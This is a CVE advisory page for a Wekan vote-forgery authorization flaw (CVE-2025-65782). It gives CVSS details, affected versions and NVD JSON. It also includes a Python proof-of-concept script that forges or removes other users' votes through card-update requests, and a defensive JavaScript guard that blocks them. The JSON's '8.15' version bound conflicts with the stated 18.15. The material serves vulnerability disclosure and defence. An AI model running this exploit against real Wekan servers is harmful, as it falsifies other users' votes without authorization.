Security Vulnerability Report
CVE-2025-65782 CVSS 6.5 MEDIUM


Published: 2025-12-15 14:15:58
Last Modified: 2025-12-23 18:08:13

Description

An issue was discovered in Wekan The Open Source kanban board system up to version 18.15, fixed in 18.16. Authorization flaw in card update handling allows board members (and potentially other authenticated users) to add/remove arbitrary user IDs in vote.positive / vote.negative arrays, enabling vote forgery and unauthorized voting.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:wekan_project:wekan:*:*:*:*:*:*:*:* - VULNERABLE
Wekan < 18.16
Wekan <= 18.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json

# CVE-2025-65782 PoC - Wekan Vote Forgery
# Target: Wekan instance up to version 18.15

TARGET_URL = "http://target-wekan-server.com"
USERNAME = "attacker"
PASSWORD = "password"
BOARD_ID = "board_id"
CARD_ID = "vulnerable_card_id"
TARGET_USER_ID = "victim_user_id"


def login():
    """Authenticate and get session token"""
    session = requests.Session()
    login_data = {"username": USERNAME, "password": PASSWORD}
    response = session.post(f"{TARGET_URL}/api/v1/login", json=login_data)
    return session, response.json().get("token")


def forge_vote(session, token):
    """Forge vote by adding arbitrary user to vote.positive array"""
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json",
    }
    # Malicious payload: add TARGET_USER_ID to vote.positive without authorization
    payload = {
        "boardId": BOARD_ID,
        "cardId": CARD_ID,
        "set": "votes",
        "update": {"vote": {"positive": [TARGET_USER_ID], "negative": []}},
    }
    response = session.put(
        f"{TARGET_URL}/api/v1/boards/{BOARD_ID}/cards/{CARD_ID}",
        headers=headers,
        json=payload,
    )
    return response.status_code == 200


def remove_vote(session, token):
    """Remove victim's vote by modifying vote arrays"""
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json",
    }
    payload = {
        "boardId": BOARD_ID,
        "cardId": CARD_ID,
        "set": "votes",
        "update": {"vote": {"positive": [], "negative": [TARGET_USER_ID]}},
    }
    response = session.put(
        f"{TARGET_URL}/api/v1/boards/{BOARD_ID}/cards/{CARD_ID}",
        headers=headers,
        json=payload,
    )
    return response.status_code == 200


if __name__ == "__main__":
    session, token = login()
    if forge_vote(session, token):
        print("[+] Vote forgery successful - user added to vote.positive")
    else:
        print("[-] Vote forgery failed")
```
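As an added example that is not Wekan's code, the server-side check a defender would want in the card update handler: it lets a caller change only their own entry in vote.positive / vote.negative and rejects the forged updates the PoC above sends. Function and field names, and the sample user IDs, are assumptions.

```javascript
// Added example (not Wekan's code): a server-side guard for the
// vote.positive / vote.negative arrays named in CVE-2025-65782.
// A caller may only add or remove their own user ID; names are assumed.

const EMPTY_VOTE = { positive: [], negative: [] };

// IDs present in exactly one of the two arrays (added or removed).
function changedIds(before, after) {
  const b = new Set(before);
  const a = new Set(after);
  const changed = new Set();
  for (const id of b) if (!a.has(id)) changed.add(id);
  for (const id of a) if (!b.has(id)) changed.add(id);
  return changed;
}

// Returns { ok: true, vote } with a de-duplicated vote object, or { ok: false, reason }.
function authorizeVoteUpdate(currentVote, proposedVote, actingUserId) {
  const cur = { ...EMPTY_VOTE, ...(currentVote || {}) };
  const next = { ...EMPTY_VOTE, ...(proposedVote || {}) };
  if (!Array.isArray(next.positive) || !Array.isArray(next.negative)) {
    return { ok: false, reason: 'vote arrays must be arrays' };
  }
  // Every ID that differs from the stored state must be the caller's own.
  for (const field of ['positive', 'negative']) {
    for (const id of changedIds(cur[field], next[field])) {
      if (id !== actingUserId) {
        return { ok: false, reason: `cannot modify vote of user ${id}` };
      }
    }
  }
  // One user may not be counted on both sides at once.
  if (next.positive.includes(actingUserId) && next.negative.includes(actingUserId)) {
    return { ok: false, reason: 'user cannot vote both ways' };
  }
  return {
    ok: true,
    vote: { positive: [...new Set(next.positive)], negative: [...new Set(next.negative)] },
  };
}

// Constructed sample: member "u_bob" replays the PoC's forgery, then votes legitimately.
const stored = { positive: ['u_alice'], negative: [] };
const forged = authorizeVoteUpdate(stored, { positive: ['u_alice', 'u_victim'], negative: [] }, 'u_bob');
const legit = authorizeVoteUpdate(stored, { positive: ['u_alice', 'u_bob'], negative: [] }, 'u_bob');
console.log(forged.ok, forged.reason, legit.ok);
```

The same guard also blocks the PoC's second payload, which clears another member's vote, because the removed ID is not the caller's.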

References

https://github.com/wekan/wekan (Product)
https://github.com/wekan/wekan/blob/main/CHANGELOG.md#v816-2025-11-02-wekan--release (Release Notes)
https://github.com/wekan/wekan/commit/0a1a075f3153e71d9a858576f1c68d2925230d9c (Patch)
https://wekan.fi/hall-of-fame/spacebleed/ (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65782", "sourceIdentifier": "[email protected]", "published": "2025-12-15T14:15:57.680", "lastModified": "2025-12-23T18:08:12.667", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Wekan The Open Source kanban board system up to version 18.15, fixed in 18.16. Authorization flaw in card update handling allows board members (and potentially other authenticated users) to add/remove arbitrary user IDs in vote.positive / vote.negative arrays, enabling vote forgery and unauthorized voting."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wekan_project:wekan:*:*:*:*:*:*:*:*", "versionEndIncluding": 
"8.15", "matchCriteriaId": "7D13533B-E5D9-47D8-97E7-6FEC5357E4E6"}]}]}], "references": [{"url": "https://github.com/wekan/wekan", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/wekan/wekan/blob/main/CHANGELOG.md#v816-2025-11-02-wekan--release", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/wekan/wekan/commit/0a1a075f3153e71d9a858576f1c68d2925230d9c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://wekan.fi/hall-of-fame/spacebleed/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}